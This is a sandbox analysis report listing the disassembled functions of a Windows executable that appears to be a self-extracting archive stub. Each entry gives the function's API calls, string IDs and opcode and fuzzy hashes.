                                                              • Opcode ID: 836358303f2d6d14b0f5dd158502e470ac65d6f4ed247892c9fe264ba39ec6d8
                                                              • Instruction ID: cf7de49a274baa8981350daf9f210a3bf1602dd8e7b0ad4f453bebe734b7f4be
                                                              • Opcode Fuzzy Hash: 836358303f2d6d14b0f5dd158502e470ac65d6f4ed247892c9fe264ba39ec6d8
                                                              • Instruction Fuzzy Hash: 4BF0C2317806329F1F224FAB7C8567762C8AA35B853D0053BD905D7310EB2CCC556AAD
                                                              Function 00438900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 0043891E
                                                                • Part of subcall function 00438DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0043C896,00443A34,00000000,00443A34,00000000,?,0043C8BD,00443A34,00000007,00443A34,?,0043CCBA,00443A34), ref: 00438DE2
                                                                • Part of subcall function 00438DCC: GetLastError.KERNEL32(00443A34,?,0043C896,00443A34,00000000,00443A34,00000000,?,0043C8BD,00443A34,00000007,00443A34,?,0043CCBA,00443A34,00443A34), ref: 00438DF4
                                                              • _free.LIBCMT ref: 00438930
                                                              • _free.LIBCMT ref: 00438943
                                                              • _free.LIBCMT ref: 00438954
                                                              • _free.LIBCMT ref: 00438965
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID: pD
                                                              • API String ID: 776569668-1597287149
                                                              • Opcode ID: 5c4ae8a30562b6d1dc3978ebc91aa7d68827e98b3d6e2b8757208c9964f3f6aa
                                                              • Instruction ID: 03c2a37e985825bbcef496d8888ed5af9f0a78ac280f94c56cbaf96aa8560d67
                                                              • Opcode Fuzzy Hash: 5c4ae8a30562b6d1dc3978ebc91aa7d68827e98b3d6e2b8757208c9964f3f6aa
                                                              • Instruction Fuzzy Hash: 5AF03A758102268BCA066F15FE024067BB1FB29B18710256FF11C522B2CBB989819B8D
                                                              Function 0042146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 004214C2
                                                                • Part of subcall function 0041B146: GetVersionExW.KERNEL32(?), ref: 0041B16B
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004214E6
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00421500
                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00421513
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421523
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421533
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                              • String ID:
                                                              • API String ID: 2092733347-0
                                                              • Opcode ID: 8dac6efc1c6a1ef75ccd9cee45fda39f02ebc7c51c1e136b2f5e58ec5b75dd59
                                                              • Instruction ID: eeb30cde17986c4cb7e51f7636d078a4cd193634ddb5d694c486c2cbb0737e96
                                                              • Opcode Fuzzy Hash: 8dac6efc1c6a1ef75ccd9cee45fda39f02ebc7c51c1e136b2f5e58ec5b75dd59
                                                              • Instruction Fuzzy Hash: 6431F879108355ABC700DFA8D88499BB7F8FF98754F404A2EF999C3210E734D549CBAA
                                                              Function 00432AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,00432AF1,004302FC,0042FA34), ref: 00432B08
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00432B16
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00432B2F
                                                              • SetLastError.KERNEL32(00000000,00432AF1,004302FC,0042FA34), ref: 00432B81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 871a424ac223a47117cc6b4d863e24e6f94995235399aebfd048fbf3c3e2116d
                                                              • Instruction ID: 38a79b9ca071c79c59eb64fe434f7a39b86427909e52018959ba4c84a5a2139e
                                                              • Opcode Fuzzy Hash: 871a424ac223a47117cc6b4d863e24e6f94995235399aebfd048fbf3c3e2116d
                                                              • Instruction Fuzzy Hash: B20124361083116EA6142F767C8592B7B58EF0AB7AF20233FF110411E0EF99AC00924C
                                                              Function 004397E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,00451030,00434674,00451030,?,?,00433F73,00000050,?,00451030,00000200), ref: 004397E9
                                                              • _free.LIBCMT ref: 0043981C
                                                              • _free.LIBCMT ref: 00439844
                                                              • SetLastError.KERNEL32(00000000,?,00451030,00000200), ref: 00439851
                                                              • SetLastError.KERNEL32(00000000,?,00451030,00000200), ref: 0043985D
                                                              • _abort.LIBCMT ref: 00439863
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID:
                                                              • API String ID: 3160817290-0
                                                              • Opcode ID: 5960bcb6f808acea97002157d61883073e2bdf8b18b5ce473b93f42615c9ab79
                                                              • Instruction ID: 3bbc6415f847f71bf7f1705c5ee03622287d3763fab8c1622ccc55d1bbbb0b5c
                                                              • Opcode Fuzzy Hash: 5960bcb6f808acea97002157d61883073e2bdf8b18b5ce473b93f42615c9ab79
                                                              • Instruction Fuzzy Hash: 73F0443915060122C75633267C0AB1B1A358FDBB39F30213FF61892292EFACCC06482D
                                                              Function 0042DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0042DC47
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0042DC61
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0042DC72
                                                              • TranslateMessage.USER32(?), ref: 0042DC7C
                                                              • DispatchMessageW.USER32(?), ref: 0042DC86
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0042DC91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 2148572870-0
                                                              • Opcode ID: 96d88a7126f1579e0e755e8a53e3e4446dc3760f432d7008fdde1b9e01600351
                                                              • Instruction ID: 9bbd36252c52d1aeea3118ae3683a1622621903e71df04e01831c8b25aa5d019
                                                              • Opcode Fuzzy Hash: 96d88a7126f1579e0e755e8a53e3e4446dc3760f432d7008fdde1b9e01600351
                                                              • Instruction Fuzzy Hash: 1EF03C72A01229BBCB206FA5EC4DDDB7F6DEF42792B004121B50AE2054D6789686C7A4
                                                              Function 0042A80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042A699: GetDC.USER32(00000000), ref: 0042A69D
                                                                • Part of subcall function 0042A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042A6A8
                                                                • Part of subcall function 0042A699: ReleaseDC.USER32(00000000,00000000), ref: 0042A6B3
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 0042A83C
                                                                • Part of subcall function 0042AAC9: GetDC.USER32(00000000), ref: 0042AAD2
                                                                • Part of subcall function 0042AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0042AB01
                                                                • Part of subcall function 0042AAC9: ReleaseDC.USER32(00000000,?), ref: 0042AB99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ObjectRelease$CapsDevice
                                                              • String ID: "B$($AB
                                                              • API String ID: 1061551593-1345302636
                                                              • Opcode ID: 9664b772ad1abaf588dc054e240f258616e39304a8efe7da5e5b743cb5865df6
                                                              • Instruction ID: cc35fe099237351e593cee8caf56af08e53a1b2617fbdcc64cbb0cfc24adfdb4
                                                              • Opcode Fuzzy Hash: 9664b772ad1abaf588dc054e240f258616e39304a8efe7da5e5b743cb5865df6
                                                              • Instruction Fuzzy Hash: E191FF75608350AFD710DF25D844A2BBBE8FFC9701F00496EF99AD3220DB74A946CB66
                                                              Function 0041C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004205DA: _wcslen.LIBCMT ref: 004205E0
                                                                • Part of subcall function 0041B92D: _wcsrchr.LIBVCRUNTIME ref: 0041B944
                                                              • _wcslen.LIBCMT ref: 0041C197
                                                              • _wcslen.LIBCMT ref: 0041C1DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$_wcsrchr
                                                              • String ID: .exe$.rar$.sfx
                                                              • API String ID: 3513545583-31770016
                                                              • Opcode ID: 1fefd95b0269de5fee94067bc4ee4b7c132748b40affb0cacc168a8ea11d85a6
                                                              • Instruction ID: 2be4146ed8bd1d84a39e042664329b5d740e88e1600e9ee6d5d49dfb1d1e8e00
                                                              • Opcode Fuzzy Hash: 1fefd95b0269de5fee94067bc4ee4b7c132748b40affb0cacc168a8ea11d85a6
                                                              • Instruction Fuzzy Hash: E04127315C0361A6D731AF649C82ABB77A4EF44748F20494FF9916B282E76C4DC2C39E
                                                              Function 0041BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 0041BB27
                                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0041A275,?,?,00000800,?,0041A23A,?,0041755C), ref: 0041BBC5
                                                              • _wcslen.LIBCMT ref: 0041BC3B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CurrentDirectory
                                                              • String ID: UNC$\\?\
                                                              • API String ID: 3341907918-253988292
                                                              • Opcode ID: 4de969cf18a02f1adc5a023dc66c91bf86d62e2dc61912fef8aebe6a664ff5c9
                                                              • Instruction ID: aaf1f5aa39e59a56dc47922b600c3bd223380aca90264cdb5f318f948633e4c8
                                                              • Opcode Fuzzy Hash: 4de969cf18a02f1adc5a023dc66c91bf86d62e2dc61912fef8aebe6a664ff5c9
                                                              • Instruction Fuzzy Hash: EB41E331540215B6DF21AF21DC41EEB77A9EF44394F10402FF854A3241EB78EED08AE8
                                                              Function 0042CD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcschr.LIBVCRUNTIME ref: 0042CD84
                                                                • Part of subcall function 0042AF98: _wcschr.LIBVCRUNTIME ref: 0042B033
                                                                • Part of subcall function 00421FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0041C116,00000000,.exe,?,?,00000800,?,?,?,00428E3C), ref: 00421FD1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcschr$CompareString
                                                              • String ID: <$HIDE$MAX$MIN
                                                              • API String ID: 69343711-3358265660
                                                              • Opcode ID: 1fa9a60b121fd13a718294e6bc065b67af59e6ea7426991383d973c2ae30291a
                                                              • Instruction ID: 4bbdfc3777f2cbd88e227c8380bdfe3165eaf774075ddee3f4421dcbe61a9eb3
                                                              • Opcode Fuzzy Hash: 1fa9a60b121fd13a718294e6bc065b67af59e6ea7426991383d973c2ae30291a
                                                              • Instruction Fuzzy Hash: A4318771A002299ADF25DB51EC41FEF73BCEB14354F814167E905E7180EBB89E848F99
                                                              Function 0042AAC9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0042AAD2
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 0042AB01
                                                              • ReleaseDC.USER32(00000000,?), ref: 0042AB99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ObjectRelease
                                                              • String ID: -B$7B
                                                              • API String ID: 1429681911-4014454294
                                                              • Opcode ID: 2190edd7e4890acf3e5c97d9ac353b96826223f8dc678e0225427d60fae095d3
                                                              • Instruction ID: c89da3e74d56443b2fb1ed08416aaa112beb8efeeaa39c9344ef8e9c546c7170
                                                              • Opcode Fuzzy Hash: 2190edd7e4890acf3e5c97d9ac353b96826223f8dc678e0225427d60fae095d3
                                                              • Instruction Fuzzy Hash: 5B212C72108344EFD3019FA5DC48E6FBFE9FB89352F040829FA49A2124D7319A949B66
                                                              Function 0041B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 0041B9B8
                                                                • Part of subcall function 00414092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004140A5
                                                              • _wcschr.LIBVCRUNTIME ref: 0041B9D6
                                                              • _wcschr.LIBVCRUNTIME ref: 0041B9E6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                              • String ID: %c:\
                                                              • API String ID: 525462905-3142399695
                                                              • Opcode ID: 00ffccc129d24782079af522487684603f30d00b26f0dbf918b91f72774da9bf
                                                              • Instruction ID: 5f50bfb82f495c9324934c086aeee7004217c7ae9e05696c38ca33ffc1455084
                                                              • Opcode Fuzzy Hash: 00ffccc129d24782079af522487684603f30d00b26f0dbf918b91f72774da9bf
                                                              • Instruction Fuzzy Hash: 8A01F5B3504312799A30AB769C42DABB7ACEE957B4B50440FF544D6282EB28D88182F9
                                                              Function 0042B270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00411316: GetDlgItem.USER32(00000000,00003021), ref: 0041135A
                                                                • Part of subcall function 00411316: SetWindowTextW.USER32(00000000,004435F4), ref: 00411370
                                                              • EndDialog.USER32(?,00000001), ref: 0042B2BE
                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0042B2D6
                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 0042B304
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: GETPASSWORD1$xzF
                                                              • API String ID: 445417207-2353342302
                                                              • Opcode ID: f805ebe4dea6d5657e0d8a082914d4901431927f29e16520f49f30ce41aaae79
                                                              • Instruction ID: bfe0d6b6cc80dc0ed3147aa4d5b31e07dcb5c9d99d025e91e76320da202c683f
                                                              • Opcode Fuzzy Hash: f805ebe4dea6d5657e0d8a082914d4901431927f29e16520f49f30ce41aaae79
                                                              • Instruction Fuzzy Hash: B6110832A00228B6DB119F64AC4DFFF376CEF19704F400062FA45B2180C7A8994597FA
                                                              Function 0042B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadBitmapW.USER32(00000065), ref: 0042B6ED
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0042B712
                                                              • DeleteObject.GDI32(00000000), ref: 0042B744
                                                              • DeleteObject.GDI32(00000000), ref: 0042B767
                                                                • Part of subcall function 0042A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0042B73D,00000066), ref: 0042A6D5
                                                                • Part of subcall function 0042A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0042B73D,00000066), ref: 0042A6EC
                                                                • Part of subcall function 0042A6C2: LoadResource.KERNEL32(00000000,?,?,?,0042B73D,00000066), ref: 0042A703
                                                                • Part of subcall function 0042A6C2: LockResource.KERNEL32(00000000,?,?,?,0042B73D,00000066), ref: 0042A712
                                                                • Part of subcall function 0042A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0042B73D,00000066), ref: 0042A72D
                                                                • Part of subcall function 0042A6C2: GlobalLock.KERNEL32(00000000), ref: 0042A73E
                                                                • Part of subcall function 0042A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0042A762
                                                                • Part of subcall function 0042A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0042A7A7
                                                                • Part of subcall function 0042A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0042A7C6
                                                                • Part of subcall function 0042A6C2: GlobalFree.KERNEL32(00000000), ref: 0042A7CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                              • String ID: ]
                                                              • API String ID: 1797374341-3352871620
                                                              • Opcode ID: a42ea25333222779cc9cfab07fa60d1250d2695d655dec2e1062c865cfaddcd5
                                                              • Instruction ID: a26bb846f34b1018275708ee6a6fbb1d89d01a37c7fd6cebfeb76ddb517d4b2c
                                                              • Opcode Fuzzy Hash: a42ea25333222779cc9cfab07fa60d1250d2695d655dec2e1062c865cfaddcd5
                                                              • Instruction Fuzzy Hash: C601E13260022167C7117B74AC09A6F7BBA9FC1B56F540026BD00A7295DF298D5952B9
                                                              Function 0042D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00411316: GetDlgItem.USER32(00000000,00003021), ref: 0041135A
                                                                • Part of subcall function 00411316: SetWindowTextW.USER32(00000000,004435F4), ref: 00411370
                                                              • EndDialog.USER32(?,00000001), ref: 0042D64B
                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0042D661
                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0042D675
                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 0042D684
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
